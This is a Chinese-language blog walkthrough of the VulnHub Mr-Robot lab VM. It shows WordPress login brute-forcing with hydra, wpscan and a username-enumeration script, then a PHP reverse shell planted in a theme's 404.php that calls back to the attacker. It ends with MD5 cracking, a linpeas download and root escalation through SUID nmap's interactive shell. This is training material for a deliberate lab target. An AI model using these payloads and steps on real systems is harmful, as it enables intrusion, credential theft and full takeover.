0x00 前置作業

首先要用virtual box匯入mrRobot.ova

0x01 偵查

┌──(kali㉿kali)-[~]
└─$ nmap -sP 192.168.44.0/24
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-03 02:34 EST
Nmap scan report for 192.168.44.2
Host is up (0.00084s latency).
Nmap scan report for 192.168.44.235
Host is up (0.00011s latency).
Nmap scan report for 192.168.44.236
Host is up (0.00042s latency).
Nmap done: 256 IP addresses (3 hosts up) scanned in 2.68 seconds

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sS -sV -T4 -A -p- 192.168.44.236
[sudo] password for kali:
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-03 02:37 EST
Nmap scan report for 192.168.44.236
Host is up (0.00060s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT    STATE  SERVICE  VERSION
22/tcp  closed ssh
80/tcp  open   http     Apache httpd
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache
443/tcp open   ssl/http Apache httpd
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after:  2025-09-13T10:45:03
|_http-server-header: Apache
MAC Address: 00:0C:29:D7:BD:EF (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.11
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.60 ms 192.168.44.236

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 104.30 seconds

根據偵查結果,可知192.168.44.236已開啟port 22, 80, 443,先看80 port的網頁:

雖然很炫,不過看不出來有什麼可以利用的,所以先爆破目錄:

┌──(kali㉿DESKTOP-NRNV04H)-[~]
└─$ gobuster dir -u http://192.168.44.236 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,bak
ld,zip,gz,conf,cnf,js===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.44.236
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Extensions:              php,txt,bak
[+] Timeout:                 10s
===============================================================
2022/12/03 15:55:21 Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 237] [--> http://192.168.44.236/images/]
/index.php            (Status: 301) [Size: 0] [--> http://192.168.44.236/]
/blog                 (Status: 301) [Size: 235] [--> http://192.168.44.236/blog/]
/rss                  (Status: 301) [Size: 0] [--> http://192.168.44.236/feed/]
/sitemap              (Status: 200) [Size: 0]
/login                (Status: 302) [Size: 0] [--> http://192.168.44.236/wp-login.php]
/0                    (Status: 301) [Size: 0] [--> http://192.168.44.236/0/]
/feed                 (Status: 301) [Size: 0] [--> http://192.168.44.236/feed/]
/video                (Status: 301) [Size: 236] [--> http://192.168.44.236/video/]
/image                (Status: 301) [Size: 0] [--> http://192.168.44.236/image/]
/atom                 (Status: 301) [Size: 0] [--> http://192.168.44.236/feed/atom/]
/wp-content           (Status: 301) [Size: 241] [--> http://192.168.44.236/wp-content/]
/admin                (Status: 301) [Size: 236] [--> http://192.168.44.236/admin/]
/audio                (Status: 301) [Size: 236] [--> http://192.168.44.236/audio/]
/intro                (Status: 200) [Size: 516314]
/wp-login.php         (Status: 200) [Size: 2696]
/wp-login             (Status: 200) [Size: 2754]
/css                  (Status: 301) [Size: 234] [--> http://192.168.44.236/css/]
/rss2                 (Status: 301) [Size: 0] [--> http://192.168.44.236/feed/]
/license              (Status: 200) [Size: 19930]
/license.txt          (Status: 200) [Size: 19930]
/wp-includes          (Status: 301) [Size: 242] [--> http://192.168.44.236/wp-includes/]
/js                   (Status: 301) [Size: 233] [--> http://192.168.44.236/js/]
/wp-register.php      (Status: 301) [Size: 0] [--> http://192.168.44.236/wp-login.php?action=register]
/Image                (Status: 301) [Size: 0] [--> http://192.168.44.236/Image/]
/wp-rss2.php          (Status: 301) [Size: 0] [--> http://192.168.44.236/feed/]
/rdf                  (Status: 301) [Size: 0] [--> http://192.168.44.236/feed/rdf/]
/page1                (Status: 301) [Size: 0] [--> http://192.168.44.236/]
/readme               (Status: 200) [Size: 7334]
/robots               (Status: 200) [Size: 41]
/robots.txt           (Status: 200) [Size: 41]
/dashboard            (Status: 302) [Size: 0] [--> http://192.168.44.236/wp-admin/]
/%20                  (Status: 301) [Size: 0] [--> http://192.168.44.236/]

看看robots.txt:

User-agent: *
fsocity.dic
key-1-of-3.txt

在網址列的236斜線後面貼上fsocity.dickey-1-of-3.txt就可以下載下來。

fsocity.dic裡有一大堆英文單字,大概是字典檔。

key-1-of-3.txt:

073403c8a58a1f80d943455fb30724b9

上面也有掃到wp-login.php:

這字典檔還是挺大的,應是有許多重複,所以用uniq來減少重複。

┌──(kali㉿kali)-[~/target_machine/mr.robot]
└─$ sort fsocity.dic | uniq > dic.txt

可以使用這字典檔來猜使用者帳戶跟密碼,用hydra的話如下:

┌──(kali㉿DESKTOP-NRNV04H)-[~/target_machine/mrRobot]
└─$ hydra -L /home/kali/target_machine/mrRobot/dic.txt -P /home/kali/target_machine/mrRobot/dic.txt -t 10 -f 192.168.44.236 http-form-post "/wp-login.php:log=^USER^&pwd=^PASS^:login_error"
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-12-03 18:46:35
[DATA] max 10 tasks per 1 server, overall 10 tasks, 131148304 login tries (l:11452/p:11452), ~13114831 tries per task
[DATA] attacking http-post-form://192.168.44.236:80/wp-login.php:log=^USER^&pwd=^PASS^:login_error
[STATUS] 1916.00 tries/min, 1916 tries in 00:01h, 131146388 to do in 1140:49h, 10 active
[STATUS] 1856.00 tries/min, 5568 tries in 00:03h, 131142736 to do in 1177:39h, 10 active
[ERROR] Can not create restore file (./hydra.restore) - Permission denied
[STATUS] 1625.57 tries/min, 11379 tries in 00:07h, 131136925 to do in 1344:32h, 10 active
[STATUS] 1041.33 tries/min, 15620 tries in 00:15h, 131132684 to do in 2098:48h, 10 active
[STATUS] 505.32 tries/min, 15665 tries in 00:31h, 131132639 to do in 4325:03h, 10 active
[STATUS] 333.96 tries/min, 15696 tries in 00:47h, 131132608 to do in 6544:23h, 10 active
[80][http-post-form] host: 192.168.44.236   login: 000000   password: cancer
[STATUS] attack finished for 192.168.44.236 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-12-03 19:48:24

來仔細分析sudo hydra -L /home/kali/target_machine/mrRobot/dic.txt -P /home/kali/target_machine/mrRobot/dic.txt -t 50 -f 192.168.18.181 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^:login_error"這條指令。

首先,-L-P沒什麼好說,後面就是接字典檔路徑。-t-f也沒什麼好說,一個是速度,一個是要掃的網域。接下來的http-post-form就是對http用post方法,會用post方法的原因可以看下圖:

在登錄頁面先按F12,出現上圖畫面。如果在登錄時隨便輸aaa當帳密,可以從上圖發現其實是用了POST方法。

好,那接下來的""裡面的內容,/wp-login.php應該不用說,問題是logpwdlogin_error怎麼來的。看一下登入頁面的原始碼:

看到紅圈圈,就是理由。

不過超慢,超級慢。慢的原因很好想: 每一個帳號都要對每一個密碼做驗證,現在帳號密碼都用同一個字典檔,假設檔案裡有n筆資料,那麼時間複雜度就是$\mathcal{O}(n^2)$。看看上面用hydra的那一段,總共有9位數的資料要試,一分鐘只能處理2千多筆,要處理到什麼時候?

所以應該兩件事分開做,先確定哪些帳號是正確的,再用正確的帳號去做密碼爆破。

如何確定帳號是正確的? 用下面一小段python code去登入帳號:

import requests

open_file = open('dic.txt', 'r')
temp = open_file.read().splitlines()
count = 0
for username in temp:
    payload = {'log': '{0}'.format(username), 'pwd': 'dummy'}
    headers = {'Content-Type' : 'application/x-www-form-urlencoded'}
    cookies = dict(wordpress_test_cookie='WP+Cookie+check')
    r = requests.post("http://192.168.18.181/wp-login.php", data=payload, headers=headers, cookies=cookies)
    if "Invalid username" not in r.text:
        print username

open裡是字典檔,requests.post裡面的參數是登入頁面網址(要如何寫出這程式?),記得用第2版python執行:

└─$ python2 account2.py
elliot
Elliot
ELLIOT

知道這一些帳號後,再用wpscan來一個一個對帳號做密碼爆破。先對第一個elliot爆破。

┌──(kali㉿DESKTOP-NRNV04H)-[~]
└─$ sudo wpscan --url 192.168.18.181 -U elliot -P /home/kali/target_machine/mrRobot/dic.txt --disable-tls-checks -t 20
[sudo] password for kali:
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.18.181/ [192.168.18.181]
[+] Started: Sun Dec  4 12:05:53 2022

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Server: Apache
 |  - X-Mod-Pagespeed: 1.9.32.3-4523
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] robots.txt found: http://192.168.18.181/robots.txt
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.18.181/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.18.181/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.18.181/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.3.30 identified (Outdated, released on 0001-01-01).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://192.168.18.181/689d322.html, Match: '-release.min.js?ver=4.3.30'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://192.168.18.181/689d322.html, Match: 'WordPress 4.3.30'

[+] WordPress theme in use: twentyfifteen
 | Location: http://192.168.18.181/wp-content/themes/twentyfifteen/
 | Last Updated: 2022-11-02T00:00:00.000Z
 | Readme: http://192.168.18.181/wp-content/themes/twentyfifteen/readme.txt
 | [!] The version is out of date, the latest version is 3.3
 | Style URL: http://192.168.18.181/wp-content/themes/twentyfifteen/style.css?ver=4.3.30
 | Style Name: Twenty Fifteen
 | Style URI: https://wordpress.org/themes/twentyfifteen/
 | Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple, st...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In 404 Page (Passive Detection)
 |
 | Version: 1.3 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://192.168.18.181/wp-content/themes/twentyfifteen/style.css?ver=4.3.30, Match: 'Version: 1.3'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:08 <=========================================> (137 / 137) 100.00% Time: 00:00:08

[i] No Config Backups Found.

[+] Performing password attack on Xmlrpc Multicall against 1 user/s
[SUCCESS] - elliot / ER28-0652
All Found
Progress Time: 00:02:22 <=================================                             > (12 / 22) 54.54%  ETA: ??:??:??

[!] Valid Combinations Found:
 | Username: elliot, Password: ER28-0652

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sun Dec  4 12:08:29 2022
[+] Requests Done: 152
[+] Cached Requests: 38
[+] Data Sent: 39.905 KB
[+] Data Received: 1.282 MB
[+] Memory used: 279.648 MB
[+] Elapsed time: 00:02:36

可以看到:

[!] Valid Combinations Found:
 | Username: elliot, Password: ER28-0652

0x02 Get Shell

登入:

之前vulnhub的靶機stapler,是把reverse shell的php加在plugin來實現get shell:

再點紅圈:

再點紅圈:

可是上傳上去的php無法訪問:

所以這一次靶機要用布景主題編輯,來嵌入reverse shell:

點選404.php來編輯:

直接把整個reverse shell php程式碼放在404.php的最下面:

以下是與之前不同的reverse shell php:

<?php
$sock=fsockopen('攻擊機IP',攻擊機監聽埠);
$descriptorspec=array(
0=>$sock,
1=>$sock,
2=>$sock
);
$process=proc_open('/bin/bash',$descriptorspec,$pipes);
proc_close($process);
echo phpinfo();
?>

網址列存取http://192.168.18.181/wp-admin/404.php

注意在access網頁之前,需監聽埠:

┌──(kali㉿kali)-[~]
└─$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [192.168.18.182] from (UNKNOWN) [192.168.18.181] 42090
python -c 'import pty;pty.spawn("/bin/bash")'
daemon@linux:/opt/bitnami/apps/wordpress/htdocs$

0x03 提權

查看/etc/passwd來得知使用者:

daemon@linux:/opt/bitnami/apps/wordpress/htdocs$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
ftp:x:103:106:ftp daemon,,,:/srv/ftp:/bin/false
bitnamiftp:x:1000:1000::/opt/bitnami/apps:/bin/bitnami_ftp_false
mysql:x:1001:1001::/home/mysql:
varnish:x:999:999::/home/varnish:
robot:x:1002:1002::/home/robot:

切到robot目錄:

daemon@linux:/opt/bitnami/apps/wordpress/htdocs$ cd /home/robot
cd /home/robot
daemon@linux:/home/robot$ ls -al
ls -al
total 16
drwxr-xr-x 2 root  root  4096 Nov 13  2015 .
drwxr-xr-x 3 root  root  4096 Nov 13  2015 ..
-r-------- 1 robot robot   33 Nov 13  2015 key-2-of-3.txt
-rw-r--r-- 1 robot robot   39 Nov 13  2015 password.raw-md5
daemon@linux:/home/robot$ cat key-2-of-3.txt
cat key-2-of-3.txt
cat: key-2-of-3.txt: Permission denied

但沒有權限去看第二個key,不過有另一個線索,就是password.raw-md5

daemon@linux:/home/robot$ cat password.raw-md5
cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b

拿去解密:

得到密碼後,切換使用者:

daemon@linux:/home/robot$ su robot
su robot
Password: abcdefghijklmnopqrstuvwxyz

robot@linux:~$ pwd
pwd
/home/robot
robot@linux:~$ cat key-2-of-3.txt
cat key-2-of-3.txt
822c73956184f694993bede3eb39f959

接下來就是確認有沒有其他可提權項目。最近發現了一個有趣的shell叫LinPEAS - Linux Privilege Escalation Awesome Script,下載到靶機後,可以拿來掃linux中可能可以拿來提權的項目。

不過linpeas.sh這個檔案已經無法從作者的guthub:PEASS-ng/linPEAS at master · carlospolop/PEASS-ng · GitHub下載到。這一次是從PEASS-ng Windows/linux/unix*/macOS提权工具 - 🔰雨苁ℒ🔰下載的。下載到攻擊機後,在下載地點所在處下python -m http.server指令,接下來的靶機指令如下:

robot@linux:~$  cd /tmp
cd /tmp
robot@linux:/tmp$ wget http://192.168.18.182:8000/linpeas.sh
wget http://192.168.18.182:8000/linpeas.sh
--2022-12-04 00:50:27--  http://192.168.18.182:8000/linpeas.sh
Connecting to 192.168.18.182:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 776167 (758K) [text/x-sh]
Saving to: ‘linpeas.sh’

100%[======================================>] 776,167     --.-K/s   in 0.1s

2022-12-04 00:50:27 (6.37 MB/s) - ‘linpeas.sh’ saved [776167/776167]

robot@linux:/tmp$ chmod +x linpeas.sh
chmod +x linpeas.sh
robot@linux:/tmp$ ./linpeas.sh

linpeas.sh的輸出非常多,這裡只列出等等要利用的:

╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
strace Not Found
-rwsr-xr-x 1 root root 44K May  7  2014 /bin/ping
-rwsr-xr-x 1 root root 68K Feb 12  2015 /bin/umount  --->  BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 93K Feb 12  2015 /bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 44K May  7  2014 /bin/ping6
-rwsr-xr-x 1 root root 37K Feb 17  2014 /bin/su
-rwsr-xr-x 1 root root 46K Feb 17  2014 /usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 32K Feb 17  2014 /usr/bin/newgrp  --->  HP-UX_10.20
-rwsr-xr-x 1 root root 41K Feb 17  2014 /usr/bin/chsh
-rwsr-xr-x 1 root root 46K Feb 17  2014 /usr/bin/chfn  --->  SuSE_9.3/10
-rwsr-xr-x 1 root root 67K Feb 17  2014 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 152K Mar 12  2015 /usr/bin/sudo  --->  check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x 1 root root 493K Nov 13  2015 /usr/local/bin/nmap
-rwsr-xr-x 1 root root 431K May 12  2014 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 10K Feb 25  2014 /usr/lib/eject/dmcrypt-get-device
-r-sr-xr-x 1 root root 9.4K Nov 13  2015 /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
-r-sr-xr-x 1 root root 14K Nov 13  2015 /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
-rwsr-xr-x 1 root root 11K Feb 25  2015 /usr/lib/pt_chown  --->  GNU_glibc_2.1/2.1.1_-6(08-1999)

nmap的部分還特別用黃色底色(上面看不出來,要在cmd上看),大概有鬼。

早期的nmap(2.02~5.21)版本是内置root终端的,可以通过nmap内置的rootshell进行提权。

還有Executing Linux Exploit Suggester,超讚。

如果不用這個工具,那麼可以用以下指令列出suid。

robot@linux:~$ find / -type f -perm -u=s 2>/dev/null
find / -type f -perm -u=s 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown

查看nmap版本後,確定可以用interactive模式,又因為它是suid權限,所以可以直接切到root。suid是什麼,下一章說明。

robot@linux:/tmp$ cd /usr/local/bin
cd /usr/local/bin
robot@linux:/usr/local/bin$ nmap --version
nmap --version

nmap version 3.81 ( http://www.insecure.org/nmap/ )
robot@linux:/usr/local/bin$ nmap --interactive
nmap --interactive

Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
!sh
# id
id
uid=1002(robot) gid=1002(robot) euid=0(root) groups=0(root),1002(robot)
# cd /root
cd /root
# ls al
ls al
ls: cannot access al: No such file or directory
# ls -al
ls -al
total 32
drwx------  3 root root 4096 Nov 13  2015 .
drwxr-xr-x 22 root root 4096 Sep 16  2015 ..
-rw-------  1 root root 4058 Nov 14  2015 .bash_history
-rw-r--r--  1 root root 3274 Sep 16  2015 .bashrc
drwx------  2 root root 4096 Nov 13  2015 .cache
-rw-r--r--  1 root root    0 Nov 13  2015 firstboot_done
-r--------  1 root root   33 Nov 13  2015 key-3-of-3.txt
-rw-r--r--  1 root root  140 Feb 20  2014 .profile
-rw-------  1 root root 1024 Sep 16  2015 .rnd
# cat key-3-of-3.txt
cat key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4

APPENDIX:SUID

​ SUID (Set UID)是Linux中的一种特殊权限,其功能为用户运行某个程序时,如果该程序有SUID权限,那么程序运行为进程时,进程的属主不是发起者,而是程序文件所属的属主。但是SUID权限的设置只针对二进制可执行文件,对于非可执行文件设置SUID没有任何意义.

​ 在执行过程中,调用者会暂时获得该文件的所有者权限,且该权限只在程序执行的过程中有效. 通俗的来讲,假设我们现在有一个可执行文件ls,其属主为root,当我们通过非root用户登录时,如果ls设置了SUID权限,我们可在非root用户下运行该二进制可执行文件,在执行文件时,该进程的权限将为root权限.

​ 利用此特性,我们可通过SUID进行提权

在了解SUID提权以前 我们简单看一下如何设置SUID权限

chmod u+s filename   设置SUID位
chmod u-s filename   去掉SUID设置

ls -al查看文件权限

chmod u+s binexec

執行結果如下圖:

可以看到binexec文件的权限描述符由-rwxr-xr-x变为-rwsr-xr-x

Reference

VulnHub通关日记-Mr-Robot-1-Nmap提权获取Flag - 腾讯云开发者社区-腾讯云
Vulnhub MR-ROBOT: 1 靶机渗透 - FreeBuf网络安全行业门户
VulnHub实战靶场Mr-Robot
VulnHub - Mr-Robot: 1破解 - CodeAntenna
vulnhub渗透测试之Mr-Robot - miraitowa666 - 博客园
PEASS-ng/linPEAS at master · carlospolop/PEASS-ng · GitHub
PEASS-ng Windows/linux/unix*/macOS提权工具 - 🔰雨苁ℒ🔰
简谈SUID提权 - FreeBuf网络安全行业门户
hydra爆破wordpress密码


#attack #Vulnhub #gobuster #hydra之wordpress密碼爆破 #wpscan之wordpress密碼爆破 #利用字典檔之wordpress帳號爆破python程式 #wordpress入侵 #wordpress利用編輯theme入侵 #md5破解 #linux提權偵查linpeas #suid提權 #nmap提權 #2.02<nmap<5.21







Related Posts

MySQL

MySQL

不可不知的小工具-string.Length

不可不知的小工具-string.Length

Javascript - Object vs Map

Javascript - Object vs Map


Comments